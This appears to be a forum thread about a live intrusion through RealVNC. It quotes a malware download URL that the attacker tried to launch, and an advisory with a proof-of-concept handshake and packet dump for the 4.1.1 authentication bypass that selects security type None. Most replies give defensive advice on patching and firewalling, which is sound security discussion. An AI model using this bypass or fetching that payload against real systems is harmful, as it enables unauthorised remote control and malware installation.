VNC exploits, security hack caught in progress

[siztenboots]

Are there any known exploits for VNC, reason I ask is I just caught a remote connection that took control while I was browsing these forums. Noticed the System tray icon changed colour from white to dark blue, then saw the Start , Run dialog trying to launch this

Note: ( this is more than likely a malicious piece of code )

http://195.218.117.44/sp1.exe

That was the point I killed the VNC session, which is protected with a strong password.

 

[SiHH]

Thats pretty scary actually... be interested to watch this thread.

 

[siztenboots]

Yep, confirmed VNC 4.1.x authentication security has been compromised by the easiest hack I have ever seen. Downloading latest updates right now!

Excerpt from http://www.securiteam.com/unixfocus/5WP0D1FIKC.html

Vulnerable Systems:
* RealVNC version 4.1.1

As documented in rfbproto.pdf by Tristan Richardson, the RFB (remote frame buffer) protocol performs an initial handshake which allows clients and servers to negotiate appropriate authentication measures. There are several methods of authentication, including the standard DES Challenge-Response, as well as an option to disable authentication completely. Due to an incorrect implementation, clients are able to force the server to disable authentication, and allow login without a password.

Proof of Concept:
1. Server sends its version, "RFB 003.008\n"
2. Client replies with its version, "RFB 003.008\n"
3. Server sends 1 byte which is equal to the number of security types offered
3a. Server sends an array of bytes which indicate security types offered
4. Client replies with 1 byte, chosen from the array in 3a, to select the security type
5. The handshake, if requested, is performed, followed by "0000" from the server

In RealVNC 4.1.1 and possibly prior versions which implement RFB 003.008 (though not RealVNC 4.0), the server does NOT perform a check to determine if the byte sent by the client in step 4 has actually been offered by the server in step 3a. In effect, authentication is moved from the server side to the client side. It is possible to force your client to simply request "Type 1 - None" as the security type, and gain access to the server without having to go through the time consuming and cumbersome password entry field.

Here is a typical packet dump:

Server -> Client: 52 46 42 20 30 30 33 2e 30 30 38 0a <- Server version
Client -> Server: 52 46 42 20 30 30 33 2e 30 30 38 0a <- Client version
Server -> Client: 01 02 <- One field follows... and that field is 02 (DES Challenge)
Client -> Server: 01 <- Ahh, the lovely 1 byte exploit! Beautiful, isn't it?
Server -> Client: 00 00 00 00 <-- Authenticated!

 

[derfderfley]

Are there any known exploits for VNC, reason I ask is I just caught a remote connection that took control while I was browsing these forums. Noticed the System tray icon changed colour from white to dark blue, then saw the Start , Run dialog trying to launch this

Note: ( this is more than likely a malicious piece of code )

http://195.218.117.44/sp1.exe

That was the point I killed the VNC session, which is protected with a strong password.

Well the first thing to do is report it to the abuse address of the originating IP address, assuming you have a connection log of the incoming VNC connections.
I would also drop a email to the owner of the IP address they tried to download the file from, as it looks like a webserver (which may have been compromised).

And as a last point, make sure you are not running the VNC server on the standard VNC port, it's a commonly scanned port. And you really should not run VNC on the standard port if you want to run VNC across the internet.

 

[bitslice]

have just notified the website.

.

 

[Una]

You may want to check the rest of your comp for rootkits and the like. Yes there are a few exploits out for VNC at the moment. Its possible that exe which they were trying to download was a rookit (sadly its 404 now, so I can't see what it is )

 

[siztenboots]

have just notified the website.

.

The Url resource is now 404

Out of interest , when running this from the Run dialog, it launched from Firefox, my default. This would have blocked .exe by default behaviour. Although the remote hacker could easily click on the overide.

 

[Una]

The Url resource is now 404

Out of interest , when running this from the Run dialog, it launched from Firefox, my default. This would have blocked .exe by default behaviour. Although the remote hacker could easily click on the overide.

To be honest a lot of script kiddies have automated download scripts that will try different compromised webservers from a list to download new malware. You don't want to be messing around on a box for more time than is needed.

 

[The Mad One]

Hmm scary, ive got vnc running on 2 of my pcs which are running 24/7. I've just removed the port forwarding to them till this is fixed.

 

[NathanE]

More to the point, why are you leaving remote control services exposed to the entire Internet? VNC should never be left unfirewalled. Only the most battle hardened bits of software should be exposed to the Internet.

 

[garyh]

Hmm scary, ive got vnc running on 2 of my pcs which are running 24/7. I've just removed the port forwarding to them till this is fixed.

It's already been fixed, and has been for a while.

 

[The Mad One]

More to the point, why are you leaving remote control services exposed to the entire Internet? VNC should never be left unfirewalled. Only the most battle hardened bits of software should be exposed to the Internet.

If your refering to me, vnc needs portforwarding how else would it work?
I'm running a linux firewall which is more then enough protection.

It's already been fixed, and has been for a while.

I guess i forgot which version i'm running which is 4.2.5. I guess siztenboots information is a bit out of date then?

 

[garyh]

I guess i forgot which version i'm running which is 4.2.5. I guess siztenboots information is a bit out of date then?

You would be running the updated version, with the exploit fixed. This was released almost immediately after the proof of concept was released; so hats off to the producers of RealVNC for acting so quick.

If you've been a victim of such a widely known exploit I really have no sympathy, if you're tech savy enough to use a VNC product; you should be tech savy enough to keep it up-to-date IMO.

 

[Gibbs]

Are there any known exploits for VNC, reason I ask is I just caught a remote connection that took control while I was browsing these forums. Noticed the System tray icon changed colour from white to dark blue, then saw the Start , Run dialog trying to launch this

Note: ( this is more than likely a malicious piece of code )

http://195.218.117.44/sp1.exe

That was the point I killed the VNC session, which is protected with a strong password.

happened to me berfore, so i moved to UltraVNC

 

[NathanE]

If your refering to me, vnc needs portforwarding how else would it work?
I'm running a linux firewall which is more then enough protection.

Presumably it's an unconfigured firewall though, which is as good as having no firewall. If you configure it to only allow your IP/ranges access then you'd not have been hacked.

 

[Una]

Presumably it's an unconfigured firewall though, which is as good as having no firewall. If you configure it to only allow your IP/ranges access then you'd not have been hacked.

Indeed but actually its not that black and white, its possible to bypass software firewalls pretty easily using process infection. Once your binaries have been replaced its not that difficult to hide information from userland tools, especially if your malware is running at ring0.

 

[The Mad One]

If you configure it to only allow your IP/ranges access then you'd not have been hacked.

If you've been a victim of such a widely known exploit I really have no sympathy, if you're tech savy enough to use a VNC product; you should be tech savy enough to keep it up-to-date IMO.

Why are you two acting like I've been hacked? Cause I havn't.